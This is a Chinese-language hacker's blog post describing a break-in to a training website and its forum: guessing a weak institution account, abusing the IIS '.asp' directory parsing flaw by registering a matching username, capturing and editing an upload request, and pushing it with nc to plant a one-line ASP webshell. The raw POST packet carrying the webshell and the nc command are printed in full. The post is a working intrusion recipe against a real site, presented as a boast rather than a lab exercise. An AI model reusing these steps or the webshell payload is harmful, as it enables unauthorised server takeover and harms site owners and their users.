記錄一下這次是如何抓包-》改包-》上傳-》拿到WEBSHELL的。
經過仔細分析,這個網站無論從主站還是分站都不存在任何注入漏洞,當然這種網站不用說使用的是MSSQL資料,也就談不上找到ACCESS資料庫下載了, 更沒找到管理後臺頁。
那 就註冊一個用戶進去看吧這裏的註冊一共可以選擇3種用戶類型:普通會員、講師會員、機構會員。註冊的時候網頁上有提示哪個角色有什麼樣的許可權。3個我都注 冊了一次,分析得出普通會員與講師會員都沒可能性,機構會員可以上傳培訓資料,然而註冊後需要人工審核,所以估計沒戲了。
逛完他的網站再 接著逛論壇,論壇採用的是DVBBS8.0版,至於是MSSQL還是ACCESS暫不知道,不過從感覺上來說,應該是ACCESS的資料庫。BBS的管理 後臺可以訪問,默認資料庫名被改,默認管理帳號及密碼都登錄失敗。DVBBS8.0的遠程注入漏洞也宣告失敗。
至此,我覺得這站真的是無敵了(對我來說)。於是丟給別人去研究了,沒想到沒過2個小時,他就拿到WEBSHEL了,當然人家也沒告訴我是怎麼弄的,因為我們不認識。我靠~搞笑啊,我沒那麼弱吧?怎麼可能別人都能搞定我就不行呢?我是不是有啥沒想到的?趕緊反省一下...
分析來分析去,我覺得問題一定還是出在機構會員那裏,可是註冊後還得24小時後人工審核,他不可能2個小時就搞定的呀...注意觀察了一下,有了一點小發現:某些頁面所在的URL是類似這種格式的:
http://www.xxxx.com/xxx/*****/index.asp
其 中*所代表的是一些很沒有規律的字元,仔細分析之下發現這些字元就是註冊時的用戶名!O(∩_∩)O哈哈~有沒有想到點什麼呀?好先放著,我們後面用。從 這裏我們也就知道了一些已經通過審核的機構名,那麼我們猜一猜看有沒有弱口令的,比如用戶名和密碼一樣啊,密碼是123456啊什麼的。
經過多次嘗試,最後終於被我發現了一個用戶名與密碼一樣的。
登錄進去之後,發現有兩處可以上傳檔,第一處是更改自己的企業LOGO,另一處是可以上傳與課程相關的圖片。第一處過濾的很嚴格,第二處經過測試發現對上傳檔進行處理的檔已經被刪除了,這裏我猜測是那個2個小時入侵進去的人所為。那麼對我來說唯一的希望就寄託在第一處了,過濾比較嚴格,那麼就先傳個正常的圖片檔看看返回什麼效果吧。上傳成功後返回的路徑是這樣的:
UploadImg/***/20081010201.jpg
這裏的*所代表的依舊是註冊時的用戶名!O(∩_∩)O哈哈~再結合上面的小發現,是不是更覺得有意思了?我們可以註冊一個用戶名後三位是“.asp”的,然後傳個圖片上去,由於IIS的解析BUG,這個.asp用戶名目錄下的所有檔都被解析成asp並執行了。
可是剛註冊的機構會員不是要審核嗎?這不就又得等了嗎?嗯,起初我也是這麼想的,可是測試之後我發現只要註冊了,無論是否已審核都會創建那個目錄。
好,思路已經清晰了,是時候該實踐了。在上傳LOGO那裏右鍵查看原文件,搜索action發現它的值是這樣的:uppic.asp?picurl=pic&file_ad=UploadImg/****
這裏的*就不需要我再解釋了吧?試試將這裏的用戶名更改為neeke.asp並將URL補全,接著把這個頁面保存成本地html,然後打開這個本地html頁面上傳一個尾碼改為jpg的asp後門,上傳結果是失敗!是不是要瘋了?難道這就是理論與實踐的差距?
接下來才是今日的主題,雖然不知道為什麼會失敗,不過也是意料之內的。重新上傳一次(不是使用前面的本地html)並打開WSockExpert進行抓包。
抓到的資料包如下:
以下是引用片段: POST /upload/uppic.asp?picurl=pic&file_ad=UploadImg/**** HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/x-silverlight, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */* Referer: http://www.xxxxx.com/xxxx/upload/uppic.asp?picurl=pic&file_ad=UploadImg/**** Accept-Language: zh-cn Content-Type: multipart/form-data; boundary=---------------------------7d89c6100702 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727) Host: www.xxxxx.com Content-Length: 356 Connection: Keep-Alive Cache-Control: no-cache Cookie: ASPSESSIONIDQCBQDTRD=CBDAOFCDOKNKAFBGOJIELFBL; StatUserID=; geturl=%2Fbbs%2Findex%2Easp%3Fboardid%3D19; upNum=0; cck_lasttime=1227791151328; cck_count=0; cnzz_a723913=148; vw=%3A21294148%3A56594595%3A24657327%3A74573309%3A50974716%3A50987662% 3A37122531%3A67808458%3A70586579%3A70604138%3A28852802%3A47119284%3A76191357%3A37126954%3A51284925%3A52364933%3A38661202% 3A74790164%3A70610751%3A72013662%3A73415389%3A76191358%3A49587472%3A43119978%3A-251370864%3A73388968%3A70611921%3A73384211% 3A32870242%3A37063863%3A32420673%3A53783557%3A72013663%3A65003880%3A70588081%3A66406723%3A57972621%3A73406321%3A60801952% 3A40826249%3A39695629%3A49578341%3A59386483%3A41111789%3A25224022%3A69210191%3A53796330%3A38456400%3A62172134%3A29259370% 3A36499102%3A46949182%3A32361261%3A31862738%3A79674658%3A34731608%3A102446092%3A36507283%3A81784150%3A86027646%3A81809181% 3A74781075%3A72012436%3A80383143%3A83227606%3A76186399%3A81784130%3A77581333%3A73399009%3A78982247%3A73385225%3A78982193% 3A88833998%3A87432179%3A74816111%3A; sin=-1; rtime=2; ltime=1227806311218; cnzz_eid=67318861-1227622346-; tab=4; Dvbbs=; ystat_bc_809970=28764444891124193035; ystat_ss_809970=26_1227833988_1259315693 -----------------------------7d89c6100702 Content-Disposition: form-data; name="FileName"; filename="D:\WEBSHELL\yjh.jpg" Content-Type: text/plain <% On Error Resume Next execute request("a") %> -----------------------------7d89c6100702 Content-Disposition: form-data; name="Submit" 上傳截圖 -----------------------------7d89c6100702--
|
將上面的資料包中的****更改為neeke.asp並保存為txt到同nc在一個目錄下(名字可任意,這裏為neeke.txt)。接下來進入DOS,在nc所在的目錄輸入 nc -vv www.xxxxx.com 80<neeke.txt
稍等幾秒就會返回資料提交結果。本次提交返回的結果如下圖。
OK,搞定了!嘿嘿~~看來我以後還得更加細心的分析才是啊!有再牛X的技術,沒有好的頭腦,你也是笨牛一個。